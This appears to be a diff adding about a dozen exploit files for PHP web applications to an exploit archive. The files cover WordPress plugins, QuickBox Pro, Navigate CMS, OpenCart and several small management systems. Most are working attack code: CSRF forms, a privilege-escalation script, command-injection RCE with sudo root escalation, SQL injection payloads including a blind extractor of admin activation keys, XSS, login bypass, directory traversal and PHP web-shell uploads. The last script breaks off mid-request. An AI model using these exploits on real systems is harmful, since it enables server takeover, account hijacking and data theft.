# Exploit Title: WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)
# Google Dork: N/A
# Date: 2020-05-21
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: https://www.bdtask.com/
# Software Link: https://downloads.wordpress.org/plugin/multi-scheduler.1.0.0.zip
# Category: Web Application
# Version: 1.0.0
# Tested on: CentOS 7 / WordPress 5.4.1
# CVE : N/A
# 1. Technical Description:
The Multi-Scheduler plugin 1.0.0 for WordPress has a Cross-Site Request Forgery (CSRF) vulnerability
in the forms it presents, allowing the possibility of deleting records (users) when an ID is known.
# 2. Proof of Concept (PoC):
<html>
<form method="POST" action="http://[TARGET]/wp-admin/admin.php?page=msbdt_professional">
<input type="hidden" value="[ID]" name="pro_delete_id"><br>
<input type="hidden" value="Delete" name="professional_delete">
<input type="submit" value="Delete user">
</form>
</html>

58
exploits/php/webapps/48534.py Executable file
View file

@ -0,0 +1,58 @@
# Exploit Title: Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation
# Date: 2020-05-29
# Exploit Author: Raphael Karger
# Software Link: https://codex.bbpress.org/releases/
# Version: BBPress < 2.5
# CVE: CVE-2020-13693
import argparse
import requests
import bs4
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
useragent = {"User-Agent" : "This is a real browser i swear"}
def grab_nonce_login_page(url):
try:
login_page_request = requests.get(url, verify=False, timeout=10, headers=useragent)
soup = bs4.BeautifulSoup(login_page_request.text, "lxml")
action = soup.find("form", class_="bbp-login-form")
wp_login_page = action.get("action")
wp_nonce = action.find("input", id="_wpnonce").get("value")
return (wp_nonce, wp_login_page)
except Exception as nonce_error:
print("[-] Nonce Error: '{}'".format(nonce_error))
return False
def exploit(url, username, password, email):
info = grab_nonce_login_page(url)
if info:
nonce = info[0]
login_page = info[1]
try:
return requests.post(login_page, data={
"user_login" : username,
"user_pass" : password,
"user_email" : email,
"user-submit" : "",
"user-cookie" : "1",
"_wpnonce" : nonce,
"bbp-forums-role" : "bbp_keymaster"
}, allow_redirects=False, verify=False, timeout=10, headers=useragent)
except Exception as e:
print("[-] Error Making Signup Post Request: '{}'".format(e))
return False
if __name__ == "__main__":
exit("asdasd")
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--username", dest="username", help="Username of Newly Created Keymaster", default="raphaelrocks")
parser.add_argument("-p", "--password", dest="password", help="Password of Newly Created Keymaster", default="raphael123")
parser.add_argument("-e", "--email", dest="email", help="Email of Newly Created Keymaster", default="test@example.com")
parser.add_argument("-u", "--url", dest="url", help="URL of Page With Exposed Register Page.", required=True)
args = parser.parse_args()
site_exploit = exploit(args.url, args.username, args.password, args.email)
if site_exploit and site_exploit.status_code == 302:
exit("[+] Exploit Successful, Use Username: '{}' and Password: '{}'".format(args.username, args.password))
print("[-] Exploit Failed")

53
exploits/php/webapps/48536.py Executable file
View file

@ -0,0 +1,53 @@
# Exploit Title: QuickBox Pro 2.1.8 - Authenticated Remote Code Execution
# Date: 2020-05-26
# Exploit Author: s1gh
# Vendor Homepage: https://quickbox.io/
# Vulnerability Details: https://s1gh.sh/cve-2020-13448-quickbox-authenticated-rce/
# Version: <= 2.1.8
# Description: An authenticated low-privileged user can exploit a command injection vulnerability to get code-execution as www-data and escalate privileges to root due to weak sudo rules.
# Tested on: Debian 9
# CVE: CVE-2020-13448
# References: https://github.com/s1gh/QuickBox-Pro-2.1.8-Authenticated-RCE
'''
Privilege escalation: After getting a reverse shell as the www-data user you can escalate to root in one of two ways.
1. sudo mysql -e '\! /bin/sh'
2. sudo mount -o bind /bin/sh /bin/mount;sudo mount
'''
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import argparse
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from urllib.parse import quote_plus
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def exploit(args):
s = requests.Session()
print('[*] Sending our payload...')
s.post('https://' + args.ip + '/inc/process.php', data={'username': args.username, 'password': args.password, 'form_submission': 'login'}, verify=False)
try:
s.get('https://' + args.ip + '/index.php?id=88&servicestart=a;' + quote_plus(args.cmd) + ';', verify=False)
except requests.exceptions.ReadTimeout:
pass
def main():
parser = argparse.ArgumentParser(description="Authenticated RCE for QuickBox Pro <= v2.1.8")
parser.add_argument('-i',dest='ip',required=True,help="Target IP Address")
parser.add_argument('-u',dest='username',required=True,help="Username")
parser.add_argument('-p',dest='password',required=True,help="Password")
parser.add_argument('-c',dest='cmd', required=True, help="Command to execute")
args = parser.parse_args()
exploit(args)
if __name__ == '__main__':
main()
sys.exit(0)

42
exploits/php/webapps/48538.txt Normal file
View file

@ -0,0 +1,42 @@
# Exploit Title: Clinic Management System 1.0 - Authentication Bypass
# Google Dork: N/A
# Date: 2020-06-02
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# my website: bkpatron.com
# Vulnerability: Attacker can bypass login page and access to dashboard page
# vulnerable file : login.php
# Parameter & Payload: '=''or'
# Proof of Concept:
http://localhost/source%20code/login.php
POST /source%20code/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
Referer: http://localhost/source%20code/login.php
Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
user=admin&email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btn_login=: undefined
HTTP/1.1 200 OK
Date: Mon, 01 Jun 2020 19:52:17 GMT
Server: Apache/2.4.39 (Win64) PHP/7.2.18
X-Powered-By: PHP/7.2.18
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4726
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

15
exploits/php/webapps/48539.txt Normal file
View file

@ -0,0 +1,15 @@
# Exploit Title: OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated)
# Date: 2020-06-01
# Exploit Author: Kailash Bohara
# Vendor Homepage: https://www.opencart.com
# Software Link: https://www.opencart.com/index.php?route=cms/download
# Version: OpenCart < 3.0.3.2
# CVE : CVE-2020-10596
1. Go to localhost.com/opencart/admin and login with credentials.
2. Then navigate to System>Users>Users and click on Action button on top right corner.
3. Now in image field , click on image and upload a new image. Before this select any image file and rename with this XSS payload "><svg onload=alert("XSS")> and then upload it as new user profile image.
4. After the upload completes the XSS pop-up executes as shown below and it will gets executed each time someone visits the Image manager section.

20
exploits/php/webapps/48542.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection (Unauthenticated)
# Date: 2020-06-02
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://phpgurukul.com/hostel-management-system/
# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7210
# Version: 2.0
# Tested on: Windows 10 - Wamp Server
--Vulnerable file /full-profile.php
--Vulnerable code;
$ret= mysqli_query($con,"SELECT * FROM registration where emailid = '".$_GET['id']."'");
Id parameter's value is going into sql query directly!
--Proof Of Concept
sqlmap -u "http://TARGET/hostel/full-profile.php?id=6"
OR
http://TARGET/hostel/full-profile.php?id=6' Single Quote will cause SQL error

62
exploits/php/webapps/48544.txt Normal file
View file

@ -0,0 +1,62 @@
# Exploit Title: Clinic Management System 1.0 - Unauthenticated Remote Code Execution
# Google Dork: N/A
# Date: 2020-06-02
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# Vulnerability:
Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution
(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
# vulnerable file : manage_website.php
# Details:
login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user.
change website logo and upload your malicious php file(<?php echo shell_exec($_GET["cmd"]); ?>). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file.
path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php
# Proof of Concept:
http://localhost/source%20code/manage_website.php
POST /source%20code/manage_website.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------135192786613366
Content-Length: 2539
Referer: http://localhost/source%20code/manage_website.php
Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-----------------------------58631544014332: undefined
Content-Disposition: form-data; name="title"
-----------------------------58631544014332
Content-Disposition: form-data; name="short_title"
-----------------------------58631544014332
Content-Disposition: form-data; name="footer"
-----------------------------58631544014332
Content-Disposition: form-data; name="currency_code"
-----------------------------58631544014332
Content-Disposition: form-data; name="currency_symbol"
-----------------------------58631544014332
Content-Disposition: form-data; name="old_website_image"
logo for hospital system.jpg
-----------------------------58631544014332
Content-Disposition: form-data; name="website_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php echo shell_exec($_GET["cmd"]); ?>

34
exploits/php/webapps/48545.py Executable file
View file

@ -0,0 +1,34 @@
# Exploit Title: Navigate CMS 2.8.7 - ''sidx' SQL Injection (Authenticated)
# Date: 2020-06-04
# Exploit Author: Gus Ralph
# Vendor Homepage: https://www.navigatecms.com/en/home
# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download
# Version: 2.8.7
# Tested on: Ubuntu
# CVE: N/A
# This script will leak the "activation_key" value for the user who's ID is set to 1 in the database.
# The activation key can be used to reset that user's password to whatever you want, bypassing the need to crack a hash.
# An example password reset URL would be: `/login.php?action=password-reset&value=[ACTIVATION CODE LEAKED FROM DB]`
import requests, time, string
user = raw_input("Please enter your username: \n")
password = raw_input("Please enter your password: \n")
URL = raw_input("Enter the target URL (in this format 'http://domain.com/navigate/'): \n")
s = requests.Session()
data = {'login-username': (None, user), 'login-password':(None, password)}
s.post(url = URL + "login.php", files = data)
dictionary = string.ascii_lowercase + string.ascii_uppercase + string.digits
final = ""
while True:
for x in dictionary:
payload = '(SELECT (CASE WHEN EXISTS(SELECT password FROM nv_users WHERE activation_key REGEXP BINARY "^' + str(final) + x + '.*" AND id = 1) THEN (SELECT sleep(5)) ELSE date_created END)); -- -'
r = s.post(url = URL + "/navigate.php?fid=comments&act=1&rows=1&sidx=" + payload)
if int(r.elapsed.total_seconds()) > 4:
final += x
print "Leaking contents of admin hash: " + final
break
else:
pass

76
exploits/php/webapps/48546.txt Normal file
View file

@ -0,0 +1,76 @@
# Exploit Title: Oriol Espinal CMS 1.0 - 'id' SQL Injection
# Google Dork: inurl:/eotools_share/
# Date: 2020-06-03
# Exploit Author: TSAR
# Vendor Homepage: http://www.oriolespinal.es/eowd
# Software Link: http://www.oriolespinal.es/eotools
# Version: ALL VERSION UP TO LATEST
# Tested on: MACOS 10.11.2
# CVE : NOt YET
[1]########### SQl INJECTION ###########
Oriol Espinal CMS is brone to a remote sql injection vulnerability, the next exploit is applicable
http://victim.com/path/eotools_share/editar.php?id=-1%20/*!50000union*/%20/*!50000all*/%20/*!50000select*/%201,2,3,4,5,6,7,8,9,10--
[2]########### SQl INJECTION ###########
Oriol Espinal CMS is brone to a file upload vulnerability, the next exploit [using Burp Suite] is applicable:
POST /path/eotools_cms/app_gestor_archivos/upload2_iframe.php HTTP/1.1
Host: victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://victim.com/path/eotools_cms/app_gestor_archivos/upload1_iframe.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------165073870416097602871919119556
Content-Length: 740
Connection: close
Cookie: PHPSESSID=e159f6c9e8a818251a4ff48d47ab3df3; acopendivids=cortina2; acgroupswithpersist=nada
-----------------------------165073870416097602871919119556
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: image/png
PNG;
********************************/
********************************/
GIF89a;
********************/
********************/<?php $_GET[d]($_GET[dd]); ?>
-----------------------------165073870416097602871919119556
Content-Disposition: form-data; name="categoria"
pdfs
-----------------------------165073870416097602871919119556
Content-Disposition: form-data; name="descripcion"
123
-----------------------------165073870416097602871919119556
Content-Disposition: form-data; name="submit"
upload
-----------------------------165073870416097602871919119556--
the shell path is:
http://victim.com/path/eotools_files/files/shell.php
==========================================================
==========================================================
Greetz To : @zigo0o - Alnjm33 - ShoOt3r - red virus - pRedAtOr - Elkatrez Elmodamer - Egy-sn!p3r
[ALL MUSLIM AND ARAB HACKERS]
==========================================================

62
exploits/php/webapps/48547.txt Normal file
View file

@ -0,0 +1,62 @@
# Exploit Title: Clinic Management System 1.0 - Authenticated Arbitrary File Upload
# Google Dork: N/A
# Date: 2020-06-02
# Exploit Author: BKpatron
# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip
# Version: v1.0
# Tested on: Win 10
# CVE: N/A
# Vulnerability:
Clinic Management System version 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution
(RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file.
# vulnerable file : manage_website.php
# Details:
login to website as patient then access the 'localhost/source%20code/manage_website.php' page, as it does not check for an admin user.
change website logo and upload your malicious php file(<?php echo shell_exec($_GET["cmd"]); ?>). if you see this message "Something Went Wrong" You have successfully uploaded the malicious php file.
path of your file: http://localhost/source%20code/uploadImage/Logo/your_file.php
# Proof of Concept:
http://localhost/source%20code/manage_website.php
POST /source%20code/manage_website.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------135192786613366
Content-Length: 2539
Referer: http://localhost/source%20code/manage_website.php
Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-----------------------------58631544014332: undefined
Content-Disposition: form-data; name="title"
-----------------------------58631544014332
Content-Disposition: form-data; name="short_title"
-----------------------------58631544014332
Content-Disposition: form-data; name="footer"
-----------------------------58631544014332
Content-Disposition: form-data; name="currency_code"
-----------------------------58631544014332
Content-Disposition: form-data; name="currency_symbol"
-----------------------------58631544014332
Content-Disposition: form-data; name="old_website_image"
logo for hospital system.jpg
-----------------------------58631544014332
Content-Disposition: form-data; name="website_image"; filename="shell.php"
Content-Type: application/octet-stream
<?php echo shell_exec($_GET["cmd"]); ?>

99
exploits/php/webapps/48548.txt Normal file
View file

@ -0,0 +1,99 @@
# Exploit Title: Navigate CMS 2.8.7 - Cross-Site Request Forgery (Add Admin)
# Date: 2020-06-04
# Exploit Author: Gus Ralph
# Vendor Homepage: https://www.navigatecms.com/en/home
# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download
# Version: 2.8.7
# Tested on: Ubuntu
# CVE:
<!--
After having an authenticated admin access this HTML page, simply go to as an unauthenticated user (path may slightly vary depending on installation location):
http://DOMAIN.com/navigate/plugins/chiv/chiv.php
-->
<script>
var logUrl = "http://localhost/navigate/navigate.php?fid=extensions&act=extension_upload";
function byteValue(x) {
return x.charCodeAt(0) & 0xff;
}
function toBytes(datastr) {
var ords = Array.prototype.map.call(datastr, byteValue);
var ui8a = new Uint8Array(ords);
return ui8a.buffer;
}
if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
this.send(toBytes(datastr));
}
}
function fileUpload(fileData, fileName) {
var fileSize = fileData.length,
boundary = "---------------------------399386530342483226231822376790",
uri = logUrl,
xhr = new XMLHttpRequest();
var additionalFields = {
}
var fileFieldName = "extension-upload";
xhr.open("POST", uri, true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8")
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary="+boundary); // simulate a file MIME POST request.
xhr.setRequestHeader("Content-Length", fileSize);
xhr.withCredentials = "true";
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
if ((xhr.status >= 200 && xhr.status <= 200) || xhr.status == 304) {
if (xhr.responseText != "") {
alert(JSON.parse(xhr.responseText).msg); // display response.
}
} else if (xhr.status == 0) {
$("#goto").show();
}
}
}
var body = "";
for (var i in additionalFields) {
if (additionalFields.hasOwnProperty(i)) {
body += addField(i, additionalFields[i], boundary);
}
}
body += addFileField(fileFieldName, fileData, fileName, boundary);
body += "--" + boundary + "--";
xhr.sendAsBinary(body);
return true;
}
function addField(name, value, boundary) {
var c = "--" + boundary + "\r\n"
c += "Content-Disposition: form-data; name='" + name + "'\r\n\r\n";
c += value + "\r\n";
return c;
}
function addFileField(name, value, filename, boundary) {
var c = "--" + boundary + "\r\n"
c += "Content-Disposition: form-data; name='" + name + "'; filename='" + filename + "'\r\n";
c += "Content-Type: application/zip\r\n\r\n";
c += value + "\r\n";
return c;
}
var start = function() {
var c = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x77\x9e\x97\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x1c\x00\x63\x68\x69\x76\x2f\x55\x54\x09\x00\x03\xc2\xe3\xa1\x5e\xdb\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00\xa4\x9d\x97\x50\x02\x75\x9f\x67\x85\x00\x00\x00\xc0\x00\x00\x00\x10\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x09\x00\x03\x33\xe2\xa1\x5e\x42\xe2\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x55\x8d\x41\x0a\xc2\x30\x10\x45\xf7\x39\xc5\x90\xb5\x34\x48\x17\x42\x57\x4a\xc9\x05\xea\x09\x62\x32\x90\xa0\xe9\x84\x64\x5a\x15\xf1\xee\xda\xd8\x2e\xfc\xcb\xff\x1e\xff\xbf\x04\x7c\x23\x39\xf0\x0d\x65\x07\xf2\x34\xc0\x59\x6b\xd0\x72\xf7\x03\x33\xe6\x12\x68\x5c\xd0\xbe\x69\xdb\xc3\xd6\x9b\x89\x3d\xe5\xa5\xee\x7d\x98\x0d\xd3\x06\xee\x78\x29\x81\xeb\x96\x67\x4e\xa5\x53\xca\x1b\x7b\x8d\xae\x09\xa4\x8e\xf6\x5f\x76\x58\x6c\x0e\x89\xd7\x87\x01\x23\x31\x42\x4f\x31\x9a\xd1\x81\x7e\xa0\x9d\x2a\x5b\x75\x7e\xa6\x3a\xbc\x7d\x88\xb7\xf8\x00\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x1c\x9e\x97\x50\x37\x55\x33\xfd\x3b\x00\x00\x00\x3b\x00\x00\x00\x15\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x69\x6e\x66\x6f\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x09\x00\x03\x18\xe3\xa1\x5e\x06\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x3c\x68\x31\x3e\x57\x65\x6c\x63\x6f\x6d\x65\x20\x74\x6f\x20\x43\x68\x69\x76\x61\x74\x6f\x27\x73\x20\x52\x43\x45\x20\x70\x6c\x75\x67\x69\x6e\x20\x66\x6f\x72\x20\x4e\x61\x76\x69\x67\x61\x74\x65\x20\x43\x4d\x53\x2e\x3c\x2f\x68\x31\x3e\x0a\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x71\x9e\x97\x50\xfa\x43\x48\xab\x1f\x00\x00\x00\x1f\x00\x00\x00\x0d\x00\x1c\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x68\x70\x55\x54\x09\x00\x03\xb5\xe3\xa1\x5e\xa4\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x3c\x3f\x70\x68\x70\x20\x73\x79\x73\x74\x65\x6d\x28\x24\x5f\x47\x45\x54\x5b\x27\x63\x6d\x64\x27\x5d\x29\x3b\x20\x3f\x3e\x0a\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x77\x9e\x97\x50\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x18\x00\x00\x00\x00\x00\x00\x00\x10\x00\xff\x41\x00\x00\x00\x00\x63\x68\x69\x76\x2f\x55\x54\x05\x00\x03\xc2\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x14\x00\x00\x00\x08\x00\xa4\x9d\x97\x50\x02\x75\x9f\x67\x85\x00\x00\x00\xc0\x00\x00\x00\x10\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xff\x81\x3f\x00\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x05\x00\x03\x33\xe2\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x1c\x9e\x97\x50\x37\x55\x33\xfd\x3b\x00\x00\x00\x3b\x00\x00\x00\x15\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\x0e\x01\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x69\x6e\x66\x6f\x2e\x70\x6c\x75\x67\x69\x6e\x55\x54\x05\x00\x03\x18\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x01\x02\x1e\x03\x0a\x00\x00\x00\x00\x00\x71\x9e\x97\x50\xfa\x43\x48\xab\x1f\x00\x00\x00\x1f\x00\x00\x00\x0d\x00\x18\x00\x00\x00\x00\x00\x01\x00\x00\x00\xa4\x81\x98\x01\x00\x00\x63\x68\x69\x76\x2f\x63\x68\x69\x76\x2e\x70\x68\x70\x55\x54\x05\x00\x03\xb5\xe3\xa1\x5e\x75\x78\x0b\x00\x01\x04\xe8\x03\x00\x00\x04\xe8\x03\x00\x00\x50\x4b\x05\x06\x00\x00\x00\x00\x04\x00\x04\x00\x4f\x01\x00\x00\xfe\x01\x00\x00\x00\x00"
fileUpload(c, "chiv.zip");
};
start();
</script>

29
exploits/php/webapps/48550.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: Navigate CMS 2.8.7 - Authenticated Directory Traversal
# Date: 2020-06-04
# Exploit Author: Gus Ralph
# Vendor Homepage: https://www.navigatecms.com/en/home
# Software Link: https://sourceforge.net/projects/navigatecms/files/releases/navigate-2.8.7r1401.zip/download
# Version: 2.8.7
# Tested on: Ubuntu
# CVE: CVE-2020-13795
A malicious user can abuse the authenticated templates functionality to traverse out of the templates directory to read and write to any file on the webserver as www-data.
For this vulnerability, I looked into the "templates" feature of the application. It seems we can edit any file in the application's templates directory, for example:
`/var/www/html/navigate/private/1/templates/`
My initial thought was to traverse out of the current directory and read the global config file (located at `/var/www/html/navigate/cfg/globals.php`).
My payload would then consist of creating a template, setting the path to be `/var/www/html/navigate/private/1/templates/../../../cfg/globals.php`
Furthermore, this can be abused to write to a PHP file and gain RCE on the remote server, for example:
Traversal payload:
`../../../navigate.php`
PHP Code execution payload:
```
<?php
system($_GET['cmd']);
?>
```

52
exploits/php/webapps/48552.sh Executable file
View file

@ -0,0 +1,52 @@
# Exploit Title: Online Marriage Registration System 1.0 Remote Code Execution
# Google Dork: N/A
# Date: 2020-05-31
# Exploit Author: Selim Enes 'Enesdex' Karaduman
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 / Xampp Server and Wamp Server
# CVE : N/A
# Notes : Exploit Requires Authentication But You Can Register As User For Free, This Is Enough To Exploit System
#!/bin/bash
echo "# Online Marriage Registration System 1.0 ---> Remote Code Execution"
echo "# Author ---> Selim Enes Karaduman"
echo "# Usage ---> ./exploit.sh -u TARGET_URL(e.g http://10.10.10.10/omrs/ -m MOBILE_NUMBER -p PASSWORD -c COMMAND"
while getopts u:m:p:c: par
do
case $par in
u) url=$OPTARG ;;
m) mnum=$OPTARG ;;
p) passwd=$OPTARG ;;
c) command=$OPTARG ;;
esac
done
sess=$(curl -s -i -X POST $url/user/login.php -d "mobno=$mnum&password=$passwd&login=" | grep -F "Set-Cookie" | sed 's/;//g' | cut -d " " -f 2)
url_for_req=$(echo $url | cut -d "/" -f 3)
function upload(){
curl -i -s -k -X $'POST' \
-H $"Host: $url_for_req" -H $'Content-Type: multipart/form-data; boundary=---------------------------8759967759481129101498329242' -H $"Cookie: $sess" -H $'Content-Length: 3244' \
-b $"$sess" \
--data-binary $'-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"dom\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofhusband\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"husimage\"; filename=\"a.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php\x0aecho system($_GET[\'cmd\']);\x0a?>\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"haddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"hadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"nofwife\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wifeimage\"; filename=\"test.jpg\"\x0d\x0aContent-Type: image/jpeg\x0d\x0a\x0d\x0ahi\x0a\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wreligion\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wdob\"\x0d\x0a\x0d\x0a05/01/2020\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wsbmarriage\"\x0d\x0a\x0d\x0aBachelor\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddress\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wzipcode\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wstate\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"wadharno\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"witnessnamef\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; name=\"waddressfirst\"\x0d\x0a\x0d\x0atest\x0d\x0a-----------------------------8759967759481129101498329242\x0d\x0aContent-Disposition: form-data; 